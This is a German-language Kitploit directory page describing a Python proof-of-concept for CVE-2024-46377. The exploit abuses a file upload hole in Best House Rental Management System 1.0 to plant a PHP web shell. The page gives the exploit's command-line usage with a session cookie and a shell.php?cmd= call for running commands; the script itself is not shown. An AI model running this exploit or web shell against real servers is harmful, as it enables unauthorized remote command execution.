Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-46377 — Python PoC-Skript, das eine willkürliche Datei-Upload-Schwachstelle im Best House Rental Management System 1.0 ausnutzt, um eine PHP-Web-Shell hochzuladen und Remote-Befehle auszuführen. | Kitploit
Tools/GitHubGitHub/vidura2/cve-2024-46377
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubvidura2/cve-2024-46377

CVE-2024-46377

Python PoC-Skript, das eine willkürliche Datei-Upload-Schwachstelle im Best House Rental Management System 1.0 ausnutzt, um eine PHP-Web-Shell hochzuladen und Remote-Befehle auszuführen.

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-46377

PoC für Schwachstelle beim beliebigen Datei-Upload in Best House Rental Management System 1.0

Übersicht

Dieses Python-Skript demonstriert, wie die Schwachstelle beim beliebigen Datei-Upload in Best House Rental Management System 1.0 ausgenutzt werden kann. Die Schwachstelle ermöglicht es einem Angreifer, eine schädliche Datei (wie eine PHP-Webshell) hochzuladen und beliebige Befehle auf dem Zielserver auszuführen.

Verwendung

  1. Klone das Repository und navigiere in das Verzeichnis:

    root@kitploit:~
    git clone https://github.com/yourusername/house-rental-poc.git
    cd house-rental-poc
    

    Führe den Exploit mit den folgenden Parametern aus:

    bash

    python exploit_house_rental.py <target_url> <file_upload_path> <session_cookie>

    target_url: Die URL der anfälligen Datei-Upload-Seite (z.B. http:///rental/admin_class.php?view=save_settings) file_upload_path: Der Pfad, unter dem die hochgeladenen Dateien gespeichert werden (z.B. http:///path/to/uploaded/files) session_cookie: Das Session-Cookie des authentifizierten Benutzers

Bei Erfolg können Sie Befehle auf dem Zielserver ausführen, indem Sie folgende URL aufrufen:

bash

root@kitploit:~
http://<file_upload_path>/shell.php?cmd=whoami

Testen Sie es, indem Sie Befehle wie whoami oder uname -a ausführen.

Beispiel

python exploit_house_rental.py http://127.0.0.1/rental/admin_class.php?view=save_settings http://127.0.0.1/uploads/ SESSION_ID=123456789

Dieser Code wird unter der MIT-Lizenz veröffentlicht.

Tool herunterladen